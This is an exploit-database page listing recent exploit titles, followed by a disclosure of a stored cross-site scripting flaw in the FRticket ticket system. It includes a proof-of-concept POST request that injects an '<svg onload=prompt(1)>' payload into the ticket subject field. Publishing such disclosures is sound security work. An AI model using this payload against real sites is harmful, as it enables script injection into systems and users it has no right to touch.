
14 new exploits FRticket Ticket System - Stored XSS Viart Shopping Cart 5.0 - CSRF Shell Upload Easy RM to MP3 Converter 2.7.3.700 - (.m3u) Exploit with Universal DEP+ASLR Bypass Dream Gallery 2.0 - Admin Panel Authentication Bypass Grid Gallery 1.0 - Admin Panel Authentication Bypass Joomla PayPlans (com_payplans) Extension 3.3.6 - SQL Injection Zabbix 2.2 - 3.0.3 - RCE with API JSON-RPC iSQL 1.0 - Shell Command Injection iSQL 1.0 - isql_main.c Buffer Overflow PoC Foxit PDF Reader 1.0.1.0925 - CPDF_StreamContentParser::~CPDF_StreamContentParser Heap-Based Memory Corruption Foxit PDF Reader 1.0.1.0925 - CPDF_DIBSource::TranslateScanline24bpp Out-of-Bounds Read Foxit PDF Reader 1.0.1.0925 - CFX_WideString::operator= Invalid Read Foxit PDF Reader 1.0.1.0925 -kdu_core::kdu_codestream::get_subsampling Memory Corruption Foxit PDF Reader 1.0.1.0925 - CFX_BaseSegmentedArray::IterateIndex Memory Corruption
49 lines
No EOL
1.4 KiB
Text
Executable file
49 lines
No EOL
1.4 KiB
Text
Executable file
# Exploit Title: FRticket - Ticket System - Stored XSS
|
||
# Google Dork: [if applicable]
|
||
# Date: 11.06.2016
|
||
# Exploit Author: Hamit ABİŞ
|
||
# Vendor Homepage: http://codecanyon.net/item/frticket-ticket-system/16539836
|
||
# Version: v1
|
||
|
||
#########################################################################################################
|
||
|
||
About
|
||
|
||
|
||
Get the world’s most popular customer support ticket system. FRticket is basically a management of enquiries between customers , agents and admins
|
||
|
||
|
||
Features:
|
||
|
||
|
||
- Admin Panel Dashboard
|
||
|
||
- Email Templates
|
||
|
||
- Agent Assignment
|
||
|
||
- Status Management
|
||
|
||
- Priority Management
|
||
|
||
- Categories Management
|
||
|
||
- And More Coming Soon…
|
||
|
||
|
||
#########################################################################################################
|
||
|
||
|
||
##########################################################################################################
|
||
Proof of Concept - Stored Ticket Title
|
||
|
||
POST /ticket/public/ticket HTTP/1.1
|
||
Host: server
|
||
User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:36.0) Gecko/20100101 Firefox/36.04
|
||
Connection: keep-alive
|
||
_token=3XSACg1vDJQgzFCkVGk7nqE0HMOPlsuo7sbj5Z2y&subject=<svg onload=prompt(1)>&priority=2&category=2&description=somecomments
|
||
|
||
##########################################################################################################
|
||
|
||
|
||
Twitter: https://twitter.com/sar1nz |